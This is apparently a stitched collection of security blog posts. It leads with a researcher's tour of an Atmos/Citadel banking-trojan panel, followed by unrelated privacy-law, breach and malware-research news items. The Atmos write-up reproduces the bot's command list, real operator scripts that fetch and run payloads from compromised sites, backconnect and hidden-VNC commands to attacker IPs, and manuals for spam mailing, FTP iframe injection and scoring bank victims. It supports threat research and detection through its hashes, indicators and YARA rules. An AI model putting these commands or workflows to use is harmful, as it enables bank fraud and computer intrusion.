entry "WebMagic" [Local WebProxySrv, web server with its own storage. Allows to read and write bot parameters directly, for example, when using injects. This saves time and resources since it doesn't generate additional remote requests for different scripts that are generally detected by banks anti-tampering controls. It also allows to bypass browser checking when requesting https:// resource hosted remotely and to create backconnect connection. Full settings description is located in F.A.Q section]


4. Commands

user_execute <url> [execute given file]
user_execute <url> -f [execute given file, manual bot update that overwrites the current version]
user_cookies_get [Get IE cookies]
user_cookies_remove [Remove IE cookies]
user_certs_get [Get .p12 certificates. Password: pass]
user_certs_remove [Remove certificates]
user_homepage_set <url> [Set browser home page]
user_flashplayer_get [Get user's .sol files]
user_flashplayer_remove [Remove user's .sol files]
url_open <url> [open given URL in a browser]
dns_filter_add <hostname> <ip> [Add domain name for redirect(blocking) *bankofamerica.com* 127.0.0.1]
dns_filter_remove <url> [Remove domain name from redirect(blocking)]
user_destroy [Corrupt system vital files and reboot the system. Requires elevated privileges]
user_logoff [Logoff currently logged in user]
os_reboot [Reboot the host]
os_shutdown [Shutdown the host]
bot_uninstall [Remove bot file and uninstall it]
bot_update <url> [Update bot configuration file. Requires the same crypt to be used. The path is set in url_config]
bot_bc_add socks <ip> <port> [Connect Bot > Backconnect Server > Socks5 | Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for Proxifier/Browser...]
bot_bc_add vnc <ip> <port> [Connect Bot > Backconnect Server > VNC Remote Display |  Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for UltraVNC client]
bot_bc_add cmd <ip> <port> [Connect Bot > Backconnect Server > Remote Shell | Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for telnet/putty client ]
bot_bc_remove <service> <ip> <port> [Disconnect from the bot and hide connections from 'netstat' output]
close_browsers [close all browser processes]

And one part related to some new features:
Q: How does Mailer work?
A: This feature allows you to create mass-email campaigns using standard PHP tools.
For this feature to work correctly you need to download the script [Download Script] and put it in the www-root directory on one of the hosts that will be used to perform the mass-email campaign - make sure you turn off the following in php.ini: magic_quotes_gpc = Off and safe_mode = Off
After that, press [ Config ] and fill in [Master E-Mail (for checkup) parameters: "name ; email" Your email for checking] and the Mailer-script URL: http://www.host.com/mailer.php
It's possible to create a campaign using an email address list collected by a bot (the "For BotID" button) or a new name;email list.
Macros are supported in Subject/Body/Attach.
{name} - Receiver name | {email} - Receiver E-mail | {random} - random chars | {rand0m} - random long number
Recommendation: To avoid being blocked by spam filters, use the macro name@{hostname} in the Sender ("email" or "name ; email") field - in this case the real domain name of the sending host will be used and your emails will not end up in the Spam folder.

Q: How do you work with the File Hunter feature?
A: This feature allows you to work with files on the bot: get a list of files matching the parameters specified under the "FileSearch" config entry, track file updates, auto-upload files and replace files on the bot.
Custom Download - allows you to download any file from a bot by BotID, given that the full path to the file is known. This will work even if the file is not specified under the "FileSearch" config entry.
Auto download - uploads files matching a given mask without the need to specify a BotID. The bot will execute the upload as soon as the search conditions are met and the file is found. This will work even if the file is not specified under the "FileSearch" config entry.
Be careful using File Hunter to modify any files on the bot. Its main purpose is to grab *coin files (multibit.dat/litecoin.dat...).
Use right-click to access the context menu for the file list.

Q: Short manual for FTP Iframer
A: As in the case of 'Mailer', for this feature to work correctly you need to download the iframer script [Download Script] and put it in the www-root directory on one of the hosts that will be used for the campaign - make sure you turn off the following in php.ini: magic_quotes_gpc = Off and safe_mode = Off
Next, create configuration options by pressing [ Configuration ]
Specify the script URL in the URL field
Working mode: Just checking [ Will check the validity of FTP accounts found in the logs ]
Inject: [Mode: "ON"]
Inject method: Smart/Add/Overwrite [ Smart - will re-add the inject in case it was detected and deleted. / Add - iframe code will be added to the end of the file before </body></html> ]
Lookup depth: [ File search depth on the ftp-host. For example, in the following structure: FTP Connection > public_html(1) > images(2) > gif(3)....]
Next, perform 'Accounts search' and 'Run tasks'. The statistics and results will be available after a few minutes. The script will work in cron mode after the first execution, so there is no need to keep the page open.

Q: Main functions and methods of "Neuromodel"
A: Neuromodel allows you to perform complex analysis of your botnet: identifying the best bots, upload success rates, and so on. You can build a research matrix that includes a list of bots and evaluates them against specified criteria; the result is a score calculated for each bot.
Each research matrix can contain a number of evaluation criteria. For example, you need to search the logs for the following data: Bank Acc + CC or Bank Acc + ISP E-mail.
Create a profile first and then plan the task based on the required criteria.

Task - "Find bots that logged into http://www.bankofamerica.com id=* in the last 30 days and where McAfee is installed. Assign X score if the search criteria match"

Creating criteria:
1) { name: BOA LOGIN | criteria: HTTP data POST | URL masks: htt*://www.bankofamerica.com/* | POST data masks: id=* | days limit: 30 | score: 1 | static method, trigger condition: No < 1 }
2) { name: AVCheck | criteria: installed software | software name mask: McAfee* | days limit: 30 | score: 1 | trigger condition: No < 1 }

The static method is used to summarize the results (a short sketch of the arithmetic follows this list):
  • No: simple summary. Each successful criteria match adds the specified score to the bot; more matches = bigger score.
    Example 1: if 180 reports match the criteria and the score is 2, then the final score will be 180*2.
    Example 2: if the 'Login to bankofamerica' criterion is set to ">=" "3" on average per day, then the score will be added only for the last days specified in the 'Days' parameter. In detail: if, in the last days specified in the 'Days' parameter, the 'Login to bankofamerica' criterion was matched more than 3 times on average, then the bots reported will be given the score points.
  • Sum: summary of produced reports. The 'Points' score will be added if the number of reports satisfying the search criteria complies with the trigger condition. For example, if we have reports_count=180 and Points=2 and the trigger condition is >= 180, then the score is +2.
  • Days: active-days summary (days containing reports). The score will be added if the number of active days satisfying the search criteria complies with the trigger condition. For example, if we have reports from the day before yesterday, yesterday and today, and the trigger condition is set to >= 3, then the scores will be added.
  • Avg/Day: average number of reports in the last 24 hours.
  • Avg/Week: average number of reports per week.
  • Days/Week: average number of active days per week.
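Here is my rough reading of the 'No' and 'Sum' arithmetic above, as a sketch; the function names are mine, and given how muddled the original write-up is (see the note below), treat it as one plausible interpretation:

def score_no(matching_reports: int, points: int) -> int:
    # 'No': every matching report adds the configured points (180 matches * 2 = 360).
    return matching_reports * points

def score_sum(matching_reports: int, points: int, threshold: int) -> int:
    # 'Sum': a flat award of the points once the report count meets the trigger
    # (reports_count=180, Points=2, trigger >= 180  ->  +2).
    return points if matching_reports >= threshold else 0

print(score_no(180, 2), score_sum(180, 2, 180))  # -> 360 2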

Another example, search for inactive accounts:
"Find the bots regardless of their scores that logged into USBank in the last 21 days no more than 3 times - no filters or criteria are applied"

1) { URL = https://onlinebanking.usbank.com/Auth/Login/Login* | HTTP URL visit | days limit = 21 | login no more than 3 times, e.g. login <=3; meaning, if <=3 reports are found for this criterion, add 1 to the score | SUM() <=3, 1 score }

The full criteria list is below:
  • Condition using the date/time of the first report received from the bot.
  • Condition using the date/time of the last report received from the bot.
  • Condition using the average online time of the bot per week or per hour.
  • Condition using the type of the report or its content:
    - Presence/lack of LUHN10 (CC)
    - Presence/lack of an ISP email address (pop3 or web-link)
    - Presence/lack of FTP accounts
    - Search by keywords
  • Condition using "Installed Software" reports; allows you to check for particular software installed on the bot.
  • Condition using "CMD" reports; allows the use of particular keywords.
  • Condition using visits to one or more particular URLs.
  • Condition using POST variables.
Minus some absolute nonsense in the descriptions of Avg/Day, Avg/Week and Days/Week.
The author is a fecking lunatic trying to explain things that only he understands :)
Thanks to Malwageddon for the translation help.

Now... take a free tour of the infrastructure.

Login:

Dashboard:
RU and UA flags, united forever :)

exe configuration:

Operating system:

Software:

Firewall:
AV:
Search:

Bots:
 Legend:


Full information:

WebInject:

Reported errors:

New group:

Edit a webinject:

Webinjects for the group 'Canada':

US:

Edit a webinject:

Script:

Script edit:

Some scripts sample:
tokenspy_update tokenspy-config.json
hvnc_start 176.9.174.237 29223
bot_bc_add vnc
bot_bc_add socks 176.9.174.237 37698
user_execute http://iguana58.ru/plugins/system/anticopy/ammy.exe
transfer
user_destroy
user_execute http://iguana58.ru/plugins/system/anticopy/adobe.exe
user_ftpclients_get
user_execute htxp://iguana58.ru/plugins/system/anticopy/adobe.exe
user_execute htxp://mareikes.com/wp-includes/pomo/svhost.exe -f
user_execute htxp://mareikes.com/wp-includes/pomo/server.exe
user_execute htxp://mareikes.com/wp-includes/pomo/ammy.exe
user_execute http://tehnoart.co/sr.exe -f
user_execute http://3dmaxkursum.net/tmp/sys/config.exe
user_execute http://coasttransit.com/wp-content/gallery/gulfport-transit-center/thumbs/htasees.exe
• dns: 1 ›› ip: 185.4.73.33 - address: IGUANA58.RU
• dns: 1 ›› ip: 176.9.24.49 - address: MAREIKES.COM
• dns: 1 ›› ip: 107.180.26.93 - address: TEHNOART.CO
• dns: 1 ›› ip: 94.73.144.210 - address: 3DMAXKURSUM.NET
• dns: 1 ›› ip: 184.168.47.225 - address: COASTTRANSIT.COM


Socks:

VNC:

Example of infected endpoints:


Config:

Backconnect logs:

Files:

SHA1: 9EA4041C41C3448E5A9D00EEA9DACB9E11EBA6C0

bcservice.ini:
[bcservice]
client_starting_port=200
bots_port=30
reboot_every_m=10

Trashed binaries:

SHA1: 987B468DB8AA400171E5365E89C3120F13F728EE

Atmos builder:
 SHA1: D3F992DCDBB0DF54C4A383163172F69A1CA967AE

Server logs start on 3 Oct 2015:

TokenSpy:

With a nice ring animation :)

Rule/test:

 Search database:
 Search list:

Setup:
With a reference to Citadel.

Report:

Favorite reports:

Search in files:

Screenshot:

View videos:

CMD parser:

Neuromodel:

Edit:


Links:

Balance grabber:
Config:
Activity:

Jabber notifier:

Notes:

Crypt exe:

FTP iframer:
Config:

The iframes lead to a Keitaro TDS, which leads to malware:

That's right, the second one is a Blackhole exploit kit.

Jérôme Segura of Malwarebytes has written about this one here: https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackhole-exploit-kit-resurfaces-in-live-attacks/
The first one is RIG exploit kit delivering Chthonic, targeting Russia and Ukraine.
And update-flashplayer.ml and update-flash-security.ml lead to an iBanking download.
SHA1: E536E23409EBF015C500D5799AD8C70787125E95

CNC at templatehtml.ru

To get back to the original subject, here is the File Hunter:


Downloaded:
Trash:

Mailer:
Config:

Mail:


Information:

Options:
Jabber address:

User:

Users:

Different admins with different rights:
Some users have limited actions; for example, one guy had only access to the malware upload feature, probably to refresh the crypt.
Six users, including the master user, use the panel in Russian; the rest are configured in English.

Install:



Files:

CC parser:

Webinject server:

Dashboard:

View:

Settings:

Replacer settings:

Chat:

Drop:

Fakes:

WebInject server 2:

Dashboard:

Command:

Logs:

Cash list:

Stats:

Drops:

State stats:

User management:

Export CSV:

Help:

/s/ panel:

Show infos:

State stats:


Help:

/s2/ panel:

/s3/ panel:

Pony used by one member of the gang:
Browser logs:

Citadel 0.0.1.1 samples:
A7D98B79FBDD7EFEBE4945F362D8A233A84D0E8D
C286C31ECC7119DD332F2462C75403D36951D79F
D399AEDA9670073E522B17B37201A1116F7D2B94
BFD9251E135D63F429641804C9A52568A83831CA
2E28E9ACAC691A40B8FAF5A95B9C92AF0947726F
5CAC9972BB247502E700735067B3A37E70C90278
959F8A78868FFE89CD4A0FD6F92D781085584E95
2716D3DE18616DBAB4B159BACE2F2285DA358C84
450A638957147A62CA9049830C3452B703875AEE
7C90F27C0640188EA5CF2498BF5964FF6788E79C
14C0728175B26446B7F140035612E303C15502CB
267DA16EC9B114ED5D9F5DEE07C2BF77D4CFD5E6
E6DD260168D6B1B29A03DF1BA875C9065B146CF3
963FE9DCEDA3A4552FAA88BABD4E9954B05C83D2
4F6AE5803C2C3EE49D11DAB48CA848F82AE31C16
8BBFA46A2ADCDF0933876EF920826AB0B02FCC18

Decrypted Citadel plugins:
B3FDC0DAFA7C0A2076AB4D42317A0E0BAAF3BA78
0B40F80C025C199F7D940BED572EA08ADE2D52F9
3B004C68C32C13CAF7F9519B6F7868BF99771F30
Hidden VNC demo: https://www.youtube.com/watch?v=TDOZfalD_LY

Atmos package:
056709A96FE05793B3544ACB4413A9EF827DCEEF
C1B79552B6F770D96B0A0C25C8C8FD87D6D629B9

Other samples (not Atmos):
02FFC98E2B5495E9C760BDA1D855DCA48A754243
B7AE6D5026C776F123BFC9DAECC07BD872C927B4
56B58A03ADB175886FBCA449CDB73BE2A82D6FEF

Some other Atmos samples (courtesy of Kafeine):
8BBFA46A2ADCDF0933876EF920826AB0B02FCC18
DAABF498242018E3EE16513E2A789D397141C7AC
04F599D501EA656FB995D1BFA4367F5939631881

You can find my yara rules for detecting Atmos here: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Atmos.yar
The Google Chrome injections appear to work from v25.0.1349.2 (2012/12/06) through v43.0.2357.134 (2015/07/14).

Fun fact: I found correlations with a CoreBot sample and the webinjects it used.
ch_new, wf2, cu_main, citi_new, ebay_new, [...]
Same kind of campaign inside their panels and the same custom file names.

If you're looking for more info about Citadel, the community did great work here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1465

継続は力なり (Perseverance is strength.)

Department of Homeland Security Issues Procedures Regarding Sharing Cybersecurity Information

On February 16, 2016, the Department of Homeland Security (“DHS”), in collaboration with other federal agencies, released a series of documents outlining procedures for both federal and non-federal entities to share and disseminate cybersecurity information. These documents were released as directed by the Cybersecurity Act of 2015 (the “Act”), signed into law on December 18, 2015. The Act outlines a means by which the private sector may enjoy protection from civil liability when sharing certain cybersecurity information with the federal government and private entities. These documents represent the first steps by the executive branch to implement the Act.

The Act directs additional actions to occur throughout the spring and early summer, and into the coming years. Notably, the Act directs DHS to certify to Congress a capability within DHS to receive cybersecurity information by March 2016, which will become the primary portal through which the federal government receives cybersecurity information under the Act. According to DHS, the Department’s Automated Information Sharing initiative will be that principal mechanism. However, the Act also states that at “any time after” DHS certifies this capability, the President can designate a non-DoD agency to also receive cybersecurity information under the Act.

Angler Exploit Kit to TeslaCrypt

There's an excellent write up by Brad Duncan in the Internet Storm Center's Handler Diaries on analyzing a compromise that used the Angler Exploit Kit to deliver TeslaCrypt.

From the article:

On Wednesday 2016-02-17 at approximately 18:14 UTC, I got a full chain of events.

The chain started with a compromised website that generated an admedia gate.

The gate led to Angler EK.

Finally, Angler EK delivered TeslaCrypt, and we saw some callback traffic from the malware.

  • 178.62.122.211 - img.belayamorda.info - admedia gate
  • 185.46.11.113 - ssd.summerspellman.com - Angler EK
  • 192.185.39.64 - clothdiapersexpert.com - TeslaCrypt callback traffic

The full write-up is here.

Some of the obfuscation may seem daunting, but there's a wealth of information on techniques to deobfuscate JavaScript and other code; a lot of that information is in the Handler Diaries themselves.





Security Weekly #451 – Mike Strouse, CEO of ProXPN

This week on Security Weekly, we introduce Mike Strouse, the CEO of ProXPN. He explains how he got started with ProXPN, and more!

 

This week's Security News segment covers:

  1. 5 Big Incident Response Mistakes
  2. D-Link DSL-2750B Remote Command Execution
  3. ASUS Router Administrative Interface Exposure
  4. A theory? - From a discussion at work I’d love some feedback on. Mass deployments of crypto lockers using compromised crews; why the increase? Some thoughts: after the OPM breach, Chinese-sponsored mercenaries are out of work and are now looking to pay the bills with resources that nation states don’t seem to care about. Mistakes get made and things get tracked to weird places, but who cares? Another thought: maybe nation states are willing to share information, as some of them have more than enough data for the time being, so they're spreading the love with other compromised hosts; those other nations don't have the same agenda: pain and profit versus information gathering.
  5. Power Grid Honeypot Puts Face on Attacks

Sucuri Labs Hex Decoder

Sucuri has a nice decoder page at http://ddecode.com/hexdecoder/ that might help if you're having trouble figuring out mixed forms of obfuscation. Even if it can't completely decode the segment, it may be able to deobfuscate it enough to give you a sense of what the code is doing.
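For simple cases you don't even need the online tool: one layer of plain hex obfuscation peels off in a couple of lines of Python (the sample string below is made up):

import binascii

blob = "68656c6c6f20776f726c64"  # hypothetical hex-only segment from some script
print(binascii.unhexlify(blob).decode("latin-1"))  # -> hello world

Tools like the Sucuri page earn their keep on the mixed layers (hex inside URL-encoding inside string concatenation) where hand-peeling gets tedious.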

Article 29 Working Party Issues Statement on 2016 Action Plan for Regulation

On February 11, 2016, the Article 29 Working Party (the “Working Party”) issued a statement on the 2016 action plan for the implementation of the EU General Data Protection Regulation (the “Regulation”). The action plan outlines the priorities for the Working Party in light of the transition to a new legal framework in Europe and the introduction of the European Data Protection Board (the “EDPB”). Accompanying the statement is a document, Work Program 2016-2018, detailing the tasks of the Working Party’s subgroups during the transitional period between the adoption of the Regulation and its implementation.

Action Plan Based on Four Priorities

The 2016 action plan sets out four priorities for the Working Party:

  • Setting up the EDPB structure and its administration. The Working Party will work together with the European Data Protection Supervisor on establishing human resources, a budget and future procedures of the EDPB. In addition, the development of IT systems for the EDPB will be a crucial step in the context of the One-Stop-Shop, according to the Working Party.
  • Preparing the One-Stop-Shop and the consistency mechanism. To help prepare for the One-Stop-Shop, the Working Party recognizes in the action plan that development is necessary in several areas, such as the designation of a lead DPA, enforcement cooperation and the EDPB consistency mechanism.
  • Issuing guidance for data controllers and processors. The Working Party will provide guidance to assist data controllers and processors in their preparation for the Regulation, specifically on topics such as the new right to portability, the notions of “high risk” and “Data Protection Impact Assessment,” and data protection officers.
  • Communication around the EDPB and the Regulation. An important task of the 2016 action plan will be to provide visibility to the EDPB by creating an online communication tool, as well as strengthening the relationships between the EU institutions and participating in external events to promote the new governance model.

Work Program of the Working Party Subgroups

The subgroups of the Working Party will continue their work, taking into account the transitional period before the implementation of the Regulation, and anticipating, to the extent possible, the application of this new legal framework. Among these tasks, the International Transfers subgroup will continue analyzing the impact that the ruling of the Court of Justice of the European Union in the Schrems case, which invalidated the Safe Harbor framework, has on other international data transfer mechanisms (i.e., Standard Contractual Clauses and Binding Corporate Rules). In addition, the subgroup will examine and deliver an opinion on the EU-U.S. Privacy Shield once it has been released, and will also analyze the impact of the Regulation on existing international data transfer mechanisms. The Key Provisions subgroup will analyze the need to update existing opinions of the Working Party and will work on the interpretation of key concepts of the Regulation.

The 2016 action plan will be reviewed periodically and complemented in 2017. Read the full Work Program 2016-2018 for more details on the tasks of each of the Working Party’s eight subgroups.

Congress Passes Judicial Redress Act

On February 10, 2016, the U.S. House of Representatives passed the Judicial Redress Act, which had been approved by the Senate the night before and included a recent Senate amendment. The House of Representatives previously passed the original bill in October 2015, but the bill was sent back to the House due to the recent Senate amendment. The Judicial Redress Act grants non-U.S. citizens certain rights, including a private right of action for alleged privacy violations that occur in the U.S. The amendment limits the right to sue to only those citizens of countries that (1) permit the “transfer of personal data for commercial purposes” to the U.S., and (2) do not impose personal data transfer policies that “materially impede” U.S. national security interests. The bill now heads to President Obama to sign.

The passing of the Judicial Redress Act is an important step that may help facilitate the approval of the new EU-U.S. Privacy Shield by European regulators. It also impacts the 2015 draft agreement known as the Protection of Personal Information Relating to the Prevention, Investigation, Detection and Prosecution of Criminal Offenses (the “Umbrella Agreement”). The Umbrella Agreement was conditioned on the passing of the Judicial Redress Act.

In addition to the private right of action, non-U.S. citizens have other rights that are granted to U.S. citizens under the Privacy Act of 1974. These include the right to request access to records shared by their governments with a U.S. federal agency in the course of a criminal investigation and to amend any inaccuracies in their records.

The Judicial Redress Act has been endorsed by the U.S. Chamber of Commerce and numerous prominent technology companies, and had strong bi-partisan support.

Update: On February 24, 2016, President Obama signed the Judicial Redress Act into law.

2015 Reported Data Breaches Surpass All Previous Years

Risk Based Security has released the Data Breach QuickView report that shows 2015 broke the previous all-time record, set back in 2012, for the number of reported data breach incidents. The 3,930 incidents reported during 2015 exposed over 736 million records.

Although overshadowed by the more than one billion records exposed in the two previous years, 2015 also ranks #3 in total reported exposed records.

The 2015 Data Breach QuickView report shows that 77.7% of reported incidents were the result of external agents or activity outside the organization with hacking accounting for 64.6% of incidents and 58.7% of exposed records. Incidents involving U.S. entities accounted for 40.5% of the incidents reported and 64.7% of the records exposed.

The report also revealed that individuals’ email addresses, passwords and user names were exposed in 38% of reported incidents, with passwords taking the top spot at 49.9% of all 2015 breaches. This is especially troubling since a high percentage of users pick a single password and use it on all their accounts, both personal and work-related.

You can get your free copy of 2015 Data Breach QuickView report here: http://www.riskbasedsecurity.com/2015-data-breach-quickview/

Kali Rolling ISO of DOOM, Too.

A while back we introduced the idea of Kali Linux Customization by demonstrating the Kali Linux ISO of Doom. Our scenario covered the installation of a custom Kali configuration which contained select tools required for a remote vulnerability assessment. The customised Kali ISO would undergo an unattended autoinstall in a remote client site, and automatically connect back to our OpenVPN server over TCP port 443. The OpenVPN connection would then bridge the remote and local networks, allowing us full "layer 3" access to the internal network from our remote location. The resulting custom ISO could then be sent to the client who would just pop it into a virtual machine template, and the whole setup would happen automagically with no intervention - as depicted in the image below.

Cryptowall son of Borracho (Flimrans)?


Lately I've received multiple questions about the connection between Reveton and Cryptowall.
I decided to have a look.

A search in the ET Intelligence portal for domains from Yonathan's Cryptowall Tracker:

An ET Intelligence search on Specspa .com
shows that the first sample ET has seen talking to it is:
e2f4bb542ea47e8928be877bb442df1b  2013-10-20

A look at the HTTP connections shows the "us.bin" call mentioned by Yonathan (btw, the us.bin item is still live there).

ET Intelligence: e2f4bb542ea47e8928be877bb442df1b HTTP connections
ET Intelligence: associated alert pointing at Cryptowall.

A look into VirusTotal Intelligence shows that this sample is available in a pcap captured and shared by ThreatGlass:

NSFW://www.threatglass .com/malicious_urls/sunporno-com


HiMan EK dropping Cryptowall, 2013-10-20,
captured by ThreatGlass

With the same referer, and in the same exploit kit, I got Flimrans dropped 20 days earlier:
(See : http://malware.dontneedcoffee.com/2013/10/HiMan.html )

Flimrans disappeared soon after this post from 2013-10-08 about the affiliate:
http://malware.dontneedcoffee.com/2013/10/flimrans-affiliate-borracho.html

Interestingly, Flimrans showed in the US the same design from Reveton pointed out by Yonathan:

Flimrans US 2013-10-03

What is worth mentioning is that Flimrans was the only ransomware (that I am aware of) to show a Spanish version of this same design:

Flimrans ES 2013-10-03

The timeline is also in line with a link between those two ransomware families (whereas Reveton was still being distributed months after these events).

Digging into my notes/Fiddler captures, I even found that this bworldonline .com, which is still hosting the us.bin, was in fact also the redirector to HiMan dropping Flimrans 20 days earlier, from the same sunporno upper.
[The credits goes to Eoin Miller who at that time pointed that infection path allowing me to replay it]

The compromised server storing the first design blob used by Cryptowall
used to redirect, 20 days earlier, to HiMan dropping Flimrans (which used that same design).




So... Cryptowall, son of Borracho? I don't know for sure... but that could be a possibility.

Files: Items mentioned here. (password is malware)

Read More:
HiMan Exploit Kit. Say Hi to one more - 2013-10-02
Flimrans Affiliate : Borracho - 2013-10-08




Will you pay $300 and allow scamsters remote control of your computer? Child's play for this BPO

Microsoft customers in Arizona were scammed by a BPO set up by fraudsters whose executives represented themselves as Microsoft employees and managed to convince them that, for a $300 charge, they would enhance the performance of their desktop computers.

Once a customer signed up, a BPO technician logged on using remote access software that provided full remote control over the desktop and proceeded to delete trash and cache files, sometimes scanning for personal information. The unsuspecting customer ended up with a marginal improvement in performance. After one year of operation, the Indian police nabbed the three men behind the operation and eleven of their employees.

There were several aspects to this case “Pune BPO which cheated Microsoft Clients in the US busted” that I found interesting:

1)    The ease with which customers were convinced to part with money and to allow an unknown third party to take remote control over their computer. With remote control, one can also install malicious files to act as a remote backdoor or spyware, making the machine vulnerable.
2)    The criminals had in their possession a list of 1 million Microsoft customers with updated contact information.
3)    The good fortune that the Indian government is unsympathetic to cybercrime both within and outside its shores, which resulted in the arrests. In certain other countries, crimes like these continue unhindered.

Cybercitizens should ensure that they do not surrender remote access to their computers or install software unless they come from trusted sources.


President Obama Signs Executive Order Establishing Federal Privacy Council

On February 9, 2016, President Obama signed an Executive Order establishing a permanent Federal Privacy Council (“Privacy Council”) that will serve as the principal interagency support structure to improve the privacy practices of government agencies and entities working on their behalf. The Privacy Council is charged with building on existing interagency efforts to protect privacy and provide expertise and assistance to government agencies, expand the skill and career development opportunities of agency privacy professionals, improve the management of agency privacy programs, and promote collaboration between and among agency privacy professionals.

Below is a summary of the key components of the Executive Order:

  • Within 120 days of the date of the Executive Order, the Director of the Office of Management and Budget (“OMB”) shall issue a revised policy that contains guidance on the roles and responsibilities, and appropriate expertise and resource levels, of Senior Agency Officials for Privacy.
  • The Privacy Council will be established as the principal interagency forum to help Senior Agency Officials for Privacy “better coordinate and collaborate, educate the federal workforce, and exchange best practices.” The Privacy Council will be chaired by the Deputy Director for Management of the OMB and will include Senior Agency Officials from numerous agencies such as the Departments of State, Treasury, Commerce, Defense and Justice.
  • The head of each agency will designate (or re-designate) a Senior Agency Official for Privacy “with the experience and skills necessary to manage an agency-wide privacy program” who will work with the Privacy Council.
  • The Privacy Council will (1) develop recommendations for OMB on federal government privacy policies and requirements; (2) coordinate and share best practices for protecting privacy and implementing appropriate safeguards; (3) help address hiring, training and professional development needs of the federal government from a privacy perspective; and (4) perform other privacy-related functions designated by the Chair.
  • The Chair and the Federal Privacy Council will coordinate with the Federal Chief Information Officers Council to promote consistency and efficiency across the executive branch in addressing data privacy and security issues.

In parallel with the Executive Order, the White House issued a fact sheet regarding the Administration’s Cybersecurity National Action Plan (“CNAP”) which “takes near-term actions and puts in place a long-term strategy to enhance cybersecurity awareness and protections, protect privacy, maintain public safety as well as economic and national security, and empower Americans to take better control of their digital security.” The CNAP includes an action to modernize government information technology and transform how the government manages cybersecurity through the proposal of a $3.1 billion Information Technology Modernization Fund, which will include the formation of a Federal Chief Information Security Officer position. The fact sheet also details the establishment of the Commission on Enhancing National Security, which will be comprised of top U.S. strategic, business and technical thinkers from outside the government who will be tasked with studying and reporting on how to better enhance cybersecurity awareness and protect privacy. To fund the implementation of the proposed actions, the 2017 budget allocates more than $19 billion for cybersecurity, which represents a 35% increase over the 2016 enacted level.

Read more about the Administration’s proposed cybersecurity and data privacy initiatives.

Administrative Law Judge Orders Health Care Provider to Pay HIPAA Civil Monetary Penalty

On February 3, 2016, the U.S. Department of Health and Human Services Office for Civil Rights (“OCR”) announced that an Administrative Law Judge (“ALJ”) ruled that Lincare, Inc. (“Lincare”) violated the HIPAA Privacy Rule and ordered the company to pay $239,800 to OCR.

Lincare, a health care provider, was investigated by OCR in 2009 after the ex-spouse of a Lincare employee discovered records in their home that contained the protected health information (“PHI”) of several hundred Lincare patients. OCR’s investigation revealed that the Lincare employee had improperly removed the PHI from Lincare’s facility and stored it in her vehicle as well as in her home. Lincare had failed to record or track the movements of the PHI and its privacy policy lacked any discussion of “safeguarding PHI that is taken off the premises of an operating center by an employee.” Additionally, the investigation found that Lincare regularly permitted employees to store PHI in their vehicles because many of their employees provided home health care services to patients. Finally, Lincare failed to take any corrective action once it learned of the incident that resulted in the complaint.

Taking into account all of these factors, OCR asserted in a Notice of Proposed Determination that Lincare committed three HIPAA Privacy Rule violations by (1) impermissibly disclosing PHI, (2) failing to reasonably safeguard PHI, and (3) neglecting to implement policies and procedures to comply with the HIPAA Privacy Rule’s requirements. Lincare appealed the Notice of Proposed Determination to the ALJ, claiming that it was not responsible for HIPAA violations because the complainant had stolen the PHI from the Lincare employee. The ALJ disagreed with Lincare’s assertion, noting in its decision that Lincare did not “provid[e] evidence to support its accusations” and that “the undisputed evidence establishes that Lincare violated HIPAA because it failed to safeguard the PHI of its patients.”

In announcing the ALJ’s decision, OCR Director Jocelyn Samuels noted that the office will “take the steps necessary, including litigation, to obtain adequate remedies for violations of the HIPAA Rules.” The ALJ’s decision marks only the second time in history that OCR has sought a civil monetary penalty for HIPAA Privacy Rule violations – the first instance was a $4.3 million penalty against Cignet Health in 2011.

Three Must Do’s to make a Security Awareness Champion

Setting an example is the best way to institutionalize security awareness within a workplace or at home. Colleagues and children naturally follow examples set by champions, as it is easier to mimic than to spend time self-learning. I have found three important aspects of championing security awareness.

Be a role model

Cybercitizen champions take an active interest in being secure by keeping themselves updated and implementing security guidelines for the gadgets and services they use at home, for work and on the Internet. Knowledge of the dos and don'ts of security for workplace systems is normally obtained through corporate security awareness programs, but for personal gadgets and services one needs to invest time reading the security guidelines provided by the service or product provider, or on gadget blogs. Security guidelines provide information on best practices for secure configuration of gadgets, use of passwords, malware prevention and methods to erase data. Besides security issues like password theft or loss of privacy, there is the possibility of becoming a victim of fraud when using e-commerce. Most e-commerce sites have a fraud awareness section to educate customers on the common types of fraud and on techniques to safeguard against them. Role models take pride in what they do, and this passion becomes a source of motivation to others around them. A security champion delights in possessing detailed insights on how to use the best security features in gadgets (say, mobile phones) or on recent security incidents.

Be a security buddy at your home

Telling people what to do to keep themselves secure online is difficult, primarily because security controls lower the user experience; as an example, most people may prefer not to have a password, or to keep a simple one for ease of use. People tend to accept risk because they do not fully realize the consequences of a damaged reputation or the financial impact from the fraudulent use of credit cards until they, or someone close to them, experience the effects firsthand. Security champions act as security buddies at home. They take time to understand how their family members, both young and old, use the Internet, and to learn about the safety, privacy and security issues related to those sites. Buddies perform the role of coaches, engaging in regular discussions on the use of these sites from the perspective of avoiding security pitfalls and risky behavior that may lead to unwanted attention from elements looking to groom children for sex or terrorism. Highlighting incidents of a similar nature helps raise awareness of the reality of the risk.

Display commitment to security at your workplace

Small acts go a long way in promoting useful security behavior. A small security cartoon displayed on a workbench can immensely add to the corporate security awareness effort. Champions bring attention to the importance of security in business by bringing up security in routine business discussions; for example, circulating insights into recently published security incidents within a discussion group (leadership, business) and popping the security question "what if a customer's security or privacy is affected?" during project discussions.

Article 29 Working Party Issues Statement on EU-U.S. Privacy Shield and Other Data Transfer Mechanisms

On February 3, 2016, the Article 29 Working Party (the “Working Party”) issued a statement on the consequences of the ruling of the Court of Justice of the European Union (the “CJEU”) in the Schrems case invalidating the European Commission’s Safe Harbor Decision.

The statement follows several weeks of analysis of the other data transfer mechanisms (i.e., the EU Standard Contractual Clauses and Binding Corporate Rules) in light of the CJEU's judgment, as well as an assessment of the current U.S. legal framework, the practices of U.S. intelligence services, and the conditions under which that framework permits interference with the EU rights to privacy and data protection.

Four Essential Guarantees for Intelligence Activities

The assessment of the Working Party is based on four essential guarantees, arising from European case law on fundamental rights:

  • The processing of personal data should be based on clear, precise and accessible rules that allow individuals to understand where their data is transferred.
